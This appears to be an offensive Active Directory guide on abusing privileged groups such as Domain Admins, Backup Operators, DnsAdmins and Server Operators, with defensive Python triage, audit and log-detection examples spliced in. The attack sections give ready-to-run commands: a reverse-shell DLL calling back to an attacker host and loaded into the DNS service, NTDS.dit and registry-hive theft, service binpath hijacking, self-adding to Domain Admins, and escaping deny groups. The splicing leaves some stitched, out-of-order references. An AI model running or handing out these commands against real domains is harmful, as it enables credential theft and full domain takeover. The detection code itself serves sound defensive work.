Privileged groups are one of the most reliable paths to domain compromise. Members inherit rights that were designed for legitimate administration but translate directly into attacker capabilities.

Finding Group Memberships

Check group membership before anything else: knowing what groups a compromised account is in tells you what you can do next without touching a single exploit.
```powershell
# Check what groups a user belongs to
net user $TARGET /domain
Get-ADUser -Identity $TARGET -Properties MemberOf | Select -ExpandProperty MemberOf

# List all members of a specific group
net group "Server Operators" /domain
Get-ADGroupMember -Identity "Server Operators" -Recursive
```

```bash
# nxc
nxc ldap $DC_IP -u $USER -p $PASSWORD -d $DOMAIN --dns-server $DC_IP -M groupmembership -o USER=$TARGET
nxc smb $IP -u $USER -p $PASSWORD --groups
```
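The `findstr "Domain Admins"` style of check above matches on display names, which are localisable and can be renamed. The following is an added example (not code from the page or from nxc/PowerView) that parses the fixed-width tables `whoami /groups` and `whoami /priv` print and matches on well-known SIDs and RIDs instead; DnsAdmins has no fixed RID, so it is the one group matched by name. The sample output is constructed and laid out by a small helper to mimic `whoami`'s column format; the privilege descriptions are the ones this page's Backup Operators and Print Operators sections rely on.

```python
"""Triage `whoami /groups` and `whoami /priv` output by SID / RID, not display name.

Added example for this page; not code from the page or any tool it names.
"""
import re

# BUILTIN aliases have fixed SIDs on every Windows host.
BUILTIN_ALIASES = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-548": "Account Operators",
    "S-1-5-32-549": "Server Operators",
    "S-1-5-32-550": "Print Operators",
    "S-1-5-32-551": "Backup Operators",
    "S-1-5-32-555": "Remote Desktop Users",
    "S-1-5-32-580": "Remote Management Users",
}
# Domain groups are <domain SID>-<RID>; these RIDs are the same in every domain.
DOMAIN_RIDS = {
    512: "Domain Admins",
    518: "Schema Admins",
    519: "Enterprise Admins",
    520: "Group Policy Creator Owners",
    525: "Protected Users",
}
# DnsAdmins is created by the DNS role with an ordinary RID, so the name is all we have.
NAME_ONLY = {"dnsadmins": "DnsAdmins"}

# Presence in the token is what matters: 'Disabled' only means the process has not
# enabled the privilege yet, which any process holding it can do.
PRIVS = {
    "SeBackupPrivilege": "read any file regardless of ACL",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeLoadDriverPrivilege": "load a kernel driver",
}

DOMAIN_SID_RE = re.compile(r"S-1-5-21-\d+-\d+-\d+-(\d+)")


def parse_whoami_table(text):
    """Parse one whoami table: the '=' separator line defines the column spans."""
    lines = text.splitlines()
    sep_idx = next(i for i, line in enumerate(lines) if line.startswith("===="))
    spans = [(m.start(), m.end()) for m in re.finditer(r"=+", lines[sep_idx])]
    header = lines[sep_idx - 1]
    names = [header[s:e].strip() for s, e in spans]
    rows = []
    for line in lines[sep_idx + 1:]:
        if not line.strip():
            continue
        cells = [line[s:e].strip() for s, e in spans[:-1]]
        cells.append(line[spans[-1][0]:].strip())  # last column may run past its '=' run
        rows.append(dict(zip(names, cells)))
    return rows


def classify_group(name, sid):
    """Return the privileged-group label for one token entry, or None."""
    if sid in BUILTIN_ALIASES:
        return BUILTIN_ALIASES[sid]
    m = DOMAIN_SID_RE.fullmatch(sid)
    if m and int(m.group(1)) in DOMAIN_RIDS:
        return DOMAIN_RIDS[int(m.group(1))]
    return NAME_ONLY.get(name.split("\\")[-1].lower())


def flag_groups(groups_output):
    """[(label, sid, usable)]; usable is False for 'Group used for deny only' entries,
    i.e. a UAC-filtered token where the membership grants nothing in this session."""
    findings = []
    for row in parse_whoami_table(groups_output):
        label = classify_group(row["Group Name"], row["SID"])
        if label:
            usable = "deny only" not in row["Attributes"].lower()
            findings.append((label, row["SID"], usable))
    return findings


def flag_privs(priv_output):
    """[(privilege, state, why it matters)] for the privileges listed in PRIVS."""
    return [(r["Privilege Name"], r["State"], PRIVS[r["Privilege Name"]])
            for r in parse_whoami_table(priv_output) if r["Privilege Name"] in PRIVS]


def _table(title, headers, rows):
    """Constructed mimic of whoami's layout: title, dashes, blank, header, '=' separator."""
    widths = [max(len(h), *(len(r[i]) for r in rows)) for i, h in enumerate(headers)]

    def fmt(cells):
        return " ".join(c.ljust(w) for c, w in zip(cells, widths)).rstrip()

    return "\n".join([title, "-" * len(title), "", fmt(headers),
                      " ".join("=" * w for w in widths)] + [fmt(r) for r in rows])


# Constructed sample token: a Backup Operator and DnsAdmin whose Domain Admins SID
# is present only as a filtered, deny-only entry. SIDs are made up.
SAMPLE_GROUPS = _table("GROUP INFORMATION", ["Group Name", "Type", "SID", "Attributes"], [
    ["Everyone", "Well-known group", "S-1-1-0", "Mandatory group, Enabled by default, Enabled group"],
    ["BUILTIN\\Backup Operators", "Alias", "S-1-5-32-551", "Mandatory group, Enabled by default, Enabled group"],
    ["CORP\\Domain Admins", "Group", "S-1-5-21-1111111111-2222222222-3333333333-512", "Group used for deny only"],
    ["CORP\\DnsAdmins", "Alias", "S-1-5-21-1111111111-2222222222-3333333333-1105", "Mandatory group, Enabled by default, Enabled group"],
])
SAMPLE_PRIVS = _table("PRIVILEGES INFORMATION", ["Privilege Name", "Description", "State"], [
    ["SeChangeNotifyPrivilege", "Bypass traverse checking", "Enabled"],
    ["SeBackupPrivilege", "Back up files and directories", "Disabled"],
    ["SeLoadDriverPrivilege", "Load and unload device drivers", "Disabled"],
])

if __name__ == "__main__":
    for label, sid, usable in flag_groups(SAMPLE_GROUPS):
        print(f"group  {label:<28} {sid}  {'usable' if usable else 'deny-only (filtered)'}")
    for priv, state, why in flag_privs(SAMPLE_PRIVS):
        print(f"priv   {priv:<28} {state:<9} {why}")
```

On a real host, pipe `whoami /groups` and `whoami /priv` into the two functions; the deny-only check is what separates "this account is a Domain Admin" from "this token can currently act as one".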

Domain Admins

The highest privilege group in the domain. Members have full control over all domain resources, can log into any machine, perform DCSync, and modify any object. Offensive value: full domain compromise. If you land here, dump NTDS, forge Golden Tickets, and do whatever you want.
```powershell
# Check if you're DA
whoami /groups | findstr "Domain Admins"

# Add yourself (if you have the right ACL)
net group "Domain Admins" $USER /add /domain
Add-DomainGroupMember -Identity "Domain Admins" -Members $USER
```

Enterprise Admins

Only exists in the forest root domain. Members have admin rights across all domains in the forest, making this more powerful than Domain Admins in multi-domain environments. Offensive value: forest-wide compromise. Required for the ExtraSids attack (child to parent domain escalation).

Schema Admins

Can modify the AD schema, which is the blueprint defining all AD object types and attributes. Rarely populated in practice. Offensive value: low day-to-day value, but schema modifications are persistent and hard to detect. Can add new attributes or backdoor the schema.

Account Operators

Can create, modify, and delete most user and group accounts in the domain. Cannot modify Domain Admins or other privileged groups, but can log into domain controllers interactively. Offensive value: create a new user and add them to groups you control. Can also reset passwords of non-privileged users.
```powershell
# Create a user
net user hacker Pass123! /add /domain

# Add to a group (within their scope)
net group "IT Support" hacker /add /domain
```

Server Operators

Can log into domain controllers interactively, start and stop services, perform backups and restores on DCs, and manage disk configuration. Offensive value: direct DC access without being DA. Because members can start and stop services on the DC, a service with a writable binPath can be abused to get SYSTEM on the DC.
```powershell
# Check services you can modify
.\SharpUp.exe audit

# Modify a service binary path to execute your payload
sc.exe config $SERVICE binpath= "cmd /c net localgroup administrators $USER /add"
sc.exe stop $SERVICE
sc.exe start $SERVICE
```

```bash
# Or check with nxc's backup_operator module
nxc smb $DC_IP -u $USER -p $PASSWORD -M backup_operator
```

Backup Operators

Members can bypass NTFS permissions to read and write any file on the system, including files locked by the OS. Can log into DCs locally and perform backup and restore operations. Offensive value: can copy SAM, SYSTEM, and NTDS.dit directly from a DC without being DA. One of the most reliable privesc paths when you land an account in this group.
```powershell
# Check if you're a Backup Operator
whoami /groups | findstr "Backup"

# Use diskshadow + robocopy to extract NTDS.dit (requires Backup Operators rights on DC)
diskshadow.exe /s script.dsh      # create VSS shadow copy via script
robocopy /b \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ C:\loot\ ntds.dit

# Grab registry hives (need SYSTEM to decrypt)
reg save HKLM\SYSTEM C:\loot\SYSTEM
reg save HKLM\SAM C:\loot\SAM
```

```bash
# Then secretsdump offline
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

# nxc can check and exploit this directly
nxc smb $DC_IP -u $USER -p $PASSWORD -M backup_operator
nxc smb $DC_IP -u $USER -p $PASSWORD --ntds
```

Print Operators

Can manage printers and printer drivers on DCs, and log into DCs interactively. Loading printer drivers requires SeLoadDriverPrivilege. Offensive value: SeLoadDriverPrivilege can be abused to load a malicious kernel driver and escalate to SYSTEM. Classic Capcom.sys / EopLoadDriver exploit path.
```powershell
# Check for SeLoadDriverPrivilege
whoami /priv | findstr SeLoadDriverPrivilege

# Abuse with EopLoadDriver (loads a vulnerable driver to escalate)
EoPLoadDriver.exe System\CurrentControlSet\dfserv C:\path\to\driver.sys
```

Remote Desktop Users

Members can connect to machines via RDP. No elevated privileges on the machine itself, just the ability to initiate an RDP session. Offensive value: lateral movement when WinRM and SMB are blocked but RDP (3389) is open.
```bash
# Check RDP access
nxc rdp $IP -u $USER -p $PASSWORD

# Connect
xfreerdp /u:$USER /p:$PASSWORD /v:$IP
```

Remote Management Users

Members can connect via WinRM (PowerShell Remoting), port 5985/5986. Added in Windows 2012. Offensive value: evil-winrm access without being a local admin. Common foothold for lateral movement once you have credentials.
```bash
nxc winrm $IP -u $USER -p $PASSWORD
evil-winrm -i $IP -u $USER -p $PASSWORD
```

DnsAdmins

Members can manage the DNS service on domain controllers and load a DLL into the DNS service process, which runs as SYSTEM. Offensive value: one of the most underrated privesc paths. Load a malicious DLL into dns.exe to get a SYSTEM shell on the DC without ever touching DA.
```bash
# Generate malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f dll -o evil.dll

# Host the DLL on an SMB share
impacket-smbserver share . -smb2support
```

```powershell
# Set the DLL as the DNS plugin (requires DnsAdmins membership)
dnscmd.exe /config /serverlevelplugindll \\$LHOST\share\evil.dll

# Restart DNS service to trigger DLL load
sc.exe stop dns
sc.exe start dns
```

Protected Users

A security group that enforces strict Kerberos protections on members: no NTLM auth, no Kerberos delegation, no cached credentials, tickets expire after 4 hours. From an attacker’s perspective this is a blocker. If your target is in Protected Users, PtH fails, delegation attacks fail, and credentials won’t be in LSASS memory after logoff. Check before wasting time on those paths.
```powershell
# Check if a user is Protected
Get-ADGroupMember -Identity "Protected Users" | Select Name

# Check if your target is protected before attempting PtH or delegation
Get-ADUser -Identity $TARGET -Properties MemberOf | Select -ExpandProperty MemberOf
```
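The enumeration section's `Get-ADGroupMember -Recursive` and the Protected Users check above are two halves of the same audit: who is transitively in a privileged group, and which of those accounts Protected Users does not cover. The following is an added example, not code from the page or from the AD module, that does both offline over a directory snapshot. The snapshot format is an assumption: a dict of group DN to the group's `member` values, which any LDAP export can be converted into. Nested groups are expanded breadth-first with cycle protection, so an A-in-B-in-A loop terminates.

```python
"""Transitive privileged-group membership and the Protected Users coverage gap.

Added example for this page; not code from the page or any tool it names.
Snapshot format (assumed): {group DN: [member DNs]}.
"""
from collections import deque

# Groups this page treats as privileged, matched on CN (case-insensitive).
PRIVILEGED = {
    "domain admins", "enterprise admins", "schema admins", "account operators",
    "server operators", "backup operators", "print operators", "dnsadmins",
    "group policy creator owners", "remote management users", "remote desktop users",
}


def cn(dn):
    """First RDN value: 'CN=Tier0-Ops,OU=Groups,DC=corp,DC=local' -> 'Tier0-Ops'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def effective_members(snapshot, group_dn):
    """{account DN: [group DNs on the shortest nesting path]} for every non-group
    object reachable from group_dn. A member counts as a group when it is a key of
    the snapshot; the seen set stops nesting loops."""
    members, seen = {}, {group_dn}
    queue = deque([(group_dn, [group_dn])])
    while queue:
        current, path = queue.popleft()
        for member in snapshot.get(current, []):
            if member in snapshot:
                if member not in seen:
                    seen.add(member)
                    queue.append((member, path + [member]))
            else:
                members.setdefault(member, path)  # BFS: first hit is the shortest path
    return members


def privileged_accounts(snapshot):
    """{account DN: [(privileged group CN, [CNs along the nesting path])]}."""
    result = {}
    for group_dn in snapshot:
        if cn(group_dn).lower() not in PRIVILEGED:
            continue
        for account, path in effective_members(snapshot, group_dn).items():
            result.setdefault(account, []).append((cn(group_dn), [cn(p) for p in path]))
    return result


def protected_users_gaps(snapshot):
    """Privileged accounts not (transitively) in Protected Users, so none of the
    protections the page lists apply to them. Treat the list as a review queue:
    a service account may still depend on NTLM and break if moved in blindly."""
    protected = set()
    for group_dn in snapshot:
        if cn(group_dn).lower() == "protected users":
            protected |= set(effective_members(snapshot, group_dn))
    return sorted(acct for acct in privileged_accounts(snapshot) if acct not in protected)


# Constructed snapshot: Domain Admins nests Tier0-Ops, which nests IT-Admins, which
# nests Tier0-Ops again (a cycle); a service account sits directly in Backup Operators.
SNAPSHOT = {
    "CN=Domain Admins,CN=Users,DC=corp,DC=local": [
        "CN=Administrator,CN=Users,DC=corp,DC=local",
        "CN=Tier0-Ops,OU=Groups,DC=corp,DC=local",
    ],
    "CN=Tier0-Ops,OU=Groups,DC=corp,DC=local": [
        "CN=alice,OU=Admins,DC=corp,DC=local",
        "CN=IT-Admins,OU=Groups,DC=corp,DC=local",
    ],
    "CN=IT-Admins,OU=Groups,DC=corp,DC=local": [
        "CN=bob,OU=Admins,DC=corp,DC=local",
        "CN=Tier0-Ops,OU=Groups,DC=corp,DC=local",  # cycle back to Tier0-Ops
    ],
    "CN=Backup Operators,CN=Builtin,DC=corp,DC=local": [
        "CN=svc-backup,OU=Service Accounts,DC=corp,DC=local",
    ],
    "CN=Protected Users,CN=Users,DC=corp,DC=local": [
        "CN=Administrator,CN=Users,DC=corp,DC=local",
        "CN=alice,OU=Admins,DC=corp,DC=local",
    ],
    "CN=Sales,OU=Groups,DC=corp,DC=local": ["CN=dave,OU=Staff,DC=corp,DC=local"],
}

if __name__ == "__main__":
    for account, hits in privileged_accounts(SNAPSHOT).items():
        for group, path in hits:
            print(f"{cn(account):<14} {group:<18} via {' -> '.join(path)}")
    print("not in Protected Users:", [cn(a) for a in protected_users_gaps(SNAPSHOT)])
```

The nesting path is kept on purpose: "bob is a Domain Admin" is a finding, but "bob is a Domain Admin via Tier0-Ops via IT-Admins" is the line that tells an administrator which membership to remove.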

Group Policy Creator Owners

Members can create Group Policy Objects in the domain. Creating a GPO alone is not dangerous, but if the GPO can be linked to an OU containing machines or users, it becomes a reliable privesc path. Offensive value: create a malicious GPO (add local admin, deploy a startup script, drop a reverse shell) and link it to a target OU. Requires separate link permissions on the OU.
```powershell
# Enumerate GPO link permissions with PowerView
Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {
    $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "Write"
}

# Create and link a malicious GPO with SharpGPOAbuse
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount $USER --GPOName "Default Domain Policy"
```

NOACCESS (Custom Deny Groups)

NOACCESS is not a built-in Windows group: it is a custom security group that organisations create to explicitly deny access to resources. Explicit DENY ACEs always override ALLOW ACEs in Windows, so membership in this group blocks the account from whatever the group is scoped against, regardless of other permissions the account holds. You will encounter these in BloodHound as a MemberOf edge from a service account or user to a group named something like NOACCESS, NO_RDP, DENY_SMB, or similar. The name usually hints at what is being blocked. Offensive value: if the account you compromised is in a NOACCESS group, it explains why your access is being denied despite valid credentials. If you have write rights on the group object, you can remove the account from it to restore access.
```powershell
# Check what groups your account is in (look for restrictive names)
net user $USER /domain
Get-ADUser -Identity $USER -Properties MemberOf | Select -ExpandProperty MemberOf

# Check the group's scope and what it denies (look at ACLs on shares, OUs, GPOs)
Get-ADGroup -Identity "NOACCESS" -Properties *
Get-ADGroupMember -Identity "NOACCESS" | Select Name

# If you have WriteProperty or GenericWrite on the group, remove yourself
Remove-ADGroupMember -Identity "NOACCESS" -Members $USER -Confirm:$false
```

```bash
# bloodyAD from Linux (if you have write rights on the group)
bloodyAD -u $USER -p $PASSWORD -d $DOMAIN --host $DC_HOST \
  remove groupMember "NOACCESS" $USER
```
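Both of the membership changes this page walks through, adding an account to Domain Admins (the "add yourself" step in that section) and removing an account from a NOACCESS-style deny group, leave the same kind of trace: a member-added or member-removed event in the Security log. The following is an added detection example, not code from the page or from any tool it names. It consumes JSON lines carrying the event's `EventID` and the EventData field names the Security log itself uses (`SubjectUserName`, `SubjectUserSid`, `MemberName`, `MemberSid`, `TargetUserName`); turning `.evtx` into that JSON is assumed to be done by the collection pipeline. The sample events, names and SIDs are constructed.

```python
"""Flag privileged-group additions and deny-group removals in Security events.

Added example for this page; not code from the page or any tool it names.
Input: JSON lines, one event per line, with Security-log field names.
"""
import json
import re
from dataclasses import dataclass

# Member added / removed, by group scope. Domain-group changes are logged on the
# DC that processed them, so every DC's Security log has to be collected.
MEMBER_ADDED = {4728: "global", 4732: "local", 4756: "universal"}
MEMBER_REMOVED = {4729: "global", 4733: "local", 4757: "universal"}

TIER0 = {
    "administrators", "domain admins", "enterprise admins", "schema admins",
    "account operators", "server operators", "backup operators", "print operators",
    "dnsadmins", "group policy creator owners",
}
REMOTE_ACCESS = {"remote management users", "remote desktop users"}
WATCHED = TIER0 | REMOTE_ACCESS
# Custom deny groups, named as the page describes (NOACCESS, NO_RDP, DENY_SMB, ...).
DENY_GROUP_RE = re.compile(r"^(NOACCESS|NO_|DENY_)", re.IGNORECASE)


@dataclass
class Alert:
    severity: str
    rule: str
    actor: str
    member: str
    group: str
    note: str


def member_cn(member_name):
    """MemberName is a DN ('CN=bob,CN=Users,DC=corp,DC=local'); keep the CN."""
    m = re.match(r"CN=([^,]+)", member_name, re.IGNORECASE)
    return m.group(1) if m else member_name


def detect(records):
    """Run both rules over parsed events; alerts come back in input order."""
    alerts = []
    for rec in records:
        eid = int(rec["EventID"])
        if eid not in MEMBER_ADDED and eid not in MEMBER_REMOVED:
            continue
        group = rec["TargetUserName"]
        actor = rec["SubjectUserName"]
        member = member_cn(rec["MemberName"])
        # Subject SID equal to member SID: the account changed its own membership,
        # which is what the page's "add yourself" / "remove yourself" steps produce.
        self_change = rec.get("SubjectUserSid") == rec.get("MemberSid")
        if eid in MEMBER_ADDED and group.lower() in WATCHED:
            severity = "high" if group.lower() in TIER0 else "medium"
            note = "self-add" if self_change else "added by another account"
            alerts.append(Alert(severity, "privileged-group-add", actor, member, group, note))
        elif eid in MEMBER_REMOVED and DENY_GROUP_RE.match(group):
            note = "self-removal" if self_change else "removed by another account"
            alerts.append(Alert("medium", "deny-group-removal", actor, member, group, note))
    return alerts


def load_jsonl(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


# Constructed events: a self-add to Domain Admins, a helpdesk add to Remote Desktop
# Users, a service account removing itself from NOACCESS, a benign add, and a logon.
SAMPLE_EVENTS = """\
{"EventID": 4728, "SubjectUserName": "bob", "SubjectUserSid": "S-1-5-21-1-2-3-1104", "MemberName": "CN=bob,CN=Users,DC=corp,DC=local", "MemberSid": "S-1-5-21-1-2-3-1104", "TargetUserName": "Domain Admins", "TargetDomainName": "CORP"}
{"EventID": 4732, "SubjectUserName": "helpdesk1", "SubjectUserSid": "S-1-5-21-1-2-3-1300", "MemberName": "CN=carol,CN=Users,DC=corp,DC=local", "MemberSid": "S-1-5-21-1-2-3-1301", "TargetUserName": "Remote Desktop Users", "TargetDomainName": "Builtin"}
{"EventID": 4729, "SubjectUserName": "svc-web", "SubjectUserSid": "S-1-5-21-1-2-3-1500", "MemberName": "CN=svc-web,OU=Service Accounts,DC=corp,DC=local", "MemberSid": "S-1-5-21-1-2-3-1500", "TargetUserName": "NOACCESS", "TargetDomainName": "CORP"}
{"EventID": 4728, "SubjectUserName": "admin-alice", "SubjectUserSid": "S-1-5-21-1-2-3-1000", "MemberName": "CN=dave,CN=Users,DC=corp,DC=local", "MemberSid": "S-1-5-21-1-2-3-1600", "TargetUserName": "Sales", "TargetDomainName": "CORP"}
{"EventID": 4624, "SubjectUserName": "-", "TargetUserName": "dave"}
"""

if __name__ == "__main__":
    for a in detect(load_jsonl(SAMPLE_EVENTS)):
        print(f"[{a.severity}] {a.rule}: {a.actor} -> {a.member} in {a.group} ({a.note})")
```

The self-change test compares SIDs rather than names because `MemberName` is a DN and `SubjectUserName` a sAMAccountName, and the two need not match even for the same account.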

Quick Reference

| Group | Can log into DC? | Key Offensive Value | Difficulty |
|---|---|---|---|
| Domain Admins | Yes | Full domain control, DCSync, Golden Ticket | You win |
| Enterprise Admins | Yes | Forest-wide control | You win |
| Backup Operators | Yes (local) | Dump NTDS.dit without DA | Medium |
| Server Operators | Yes (local) | Service abuse on DC → SYSTEM | Medium |
| Account Operators | No | Create users, reset passwords | Low |
| Print Operators | Yes (local) | SeLoadDriverPrivilege → kernel exploit | Hard |
| DnsAdmins | No | Load DLL into DNS service → SYSTEM on DC | Medium |
| Remote Management Users | No | WinRM lateral movement | Low |
| Remote Desktop Users | No | RDP lateral movement | Low |
| Group Policy Creator Owners | No | Malicious GPO if OU link rights exist | Medium |
| Protected Users | No | Blocks PtH, delegation, cached creds | Defensive |